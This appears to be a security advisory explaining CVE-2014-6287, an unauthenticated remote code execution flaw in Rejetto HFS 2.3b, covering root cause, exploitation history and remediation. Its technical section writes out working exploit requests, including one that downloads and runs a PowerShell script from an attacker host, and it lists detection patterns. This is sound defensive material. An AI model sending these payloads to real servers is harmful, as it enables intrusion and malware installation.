CVE-2014-6287

What Is Rejetto HTTP File Server?

Rejetto HTTP File Server (HFS) is a free, open-source file server for Windows that allows users to share files via a web browser without complex server setup. It is a single-executable application widely used by individuals and small teams for ad-hoc file sharing, software distribution, and as a quick web server during CTF competitions and penetration tests. HFS includes a scripting engine using "macros" — commands like {.exec|cmd.} that can run OS commands — which is a powerful feature that becomes a critical vulnerability when the macro execution can be triggered without authentication.

Overview

CVE-2014-6287 is a critical remote code execution vulnerability in Rejetto HTTP File Server (HFS) version 2.3b. The findMacroMarker function in parserLib.pas fails to properly handle null bytes in search strings, allowing an attacker to inject and execute arbitrary HFS macro commands via a crafted HTTP request. No authentication is required. A simple GET request can run any OS command — including downloading and executing malware — on the server. This vulnerability has been exploited by ransomware operators, cryptominer distributors, and APT groups for initial access, and remains one of the most commonly exploited vulnerabilities in mass scanning campaigns.

Affected Versions

Technical Details

Root Cause: Null Byte Truncation in Macro Parser

HFS 2.3b's template system uses macros — commands enclosed in {. .} brackets — that can call built-in functions including exec (execute OS commands). The search functionality passes user-supplied input to the macro parser. The findMacroMarker function in parserLib.pas uses null byte (%00) as a string terminator, similar to C string handling.

When a null byte is injected in a search query, the portion of the URL before the null byte is treated as the actual search string, while the portion after the null byte is parsed as a template containing macros. This allows injecting macro syntax directly into the search parameter:

Exploit URL:

GET /?search=%00{.exec|cmd.exe+/c+whoami.}

The null byte causes the parser to treat everything after %00 as a template, executing the exec macro. The server runs the command and returns output in the response.

One-line reverse shell:

GET /?search=%00{.exec|powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://attacker.com/shell.ps1')".}

Attack Characteristics

Discovery

Discovered and published by security researcher Daniele Linguaglossa ([email protected]), with the exploit published to Exploit-DB (EDB-34926) in September 2014.

Exploitation Context

• Mass scanning: CVE-2014-6287 is scanned for and exploited continuously by automated attack infrastructure; any HFS 2.3b instance internet-accessible will be compromised within hours of exposure
• Ransomware initial access: Multiple ransomware groups (including Metasploit-using criminal actors) use HFS RCE exploits for initial access to Windows systems running file-sharing servers
• Cryptominer distribution: Cryptomining malware (Monero miners, etc.) is frequently deployed via CVE-2014-6287 on internet-exposed HFS instances
• APT initial access: Nation-state actors have been observed using HFS exploitation as part of opportunistic initial access operations
• Metasploit module: exploit/windows/http/rejetto_hfs_exec — included in Metasploit Framework, making exploitation accessible to any operator
• CTF staple: CVE-2014-6287 is one of the most commonly used vulnerabilities in beginner CTF challenges (HackTheBox, TryHackMe machines), which has kept exploitation skills and tools widely practiced
• CISA KEV (2022): Added March 2022, nearly eight years after discovery — confirming HFS 2.3b instances remain actively exploited

Remediation

1. Update HFS to version 2.3c or later — the null byte handling was corrected in 2.3c.

2. If HFS must be used: Ensure it is never internet-accessible. Place behind a firewall and restrict access to trusted IP ranges. HFS is a personal/LAN tool; it should never be exposed to the public internet.

3. Audit for exploitation: Check HFS logs for requests containing %00 or {.exec in the search parameter. A compromised HFS server should be treated as fully compromised — reimage the host and rotate all credentials on the system.

4. Consider replacing HFS with a properly hardened file-sharing solution (e.g., SFTP server, SharePoint, or a properly configured web server with authentication) for any production use case.

5. Network monitoring: Deploy rules to detect HTTP requests containing null bytes followed by HFS macro patterns ({.exec|, {.script|).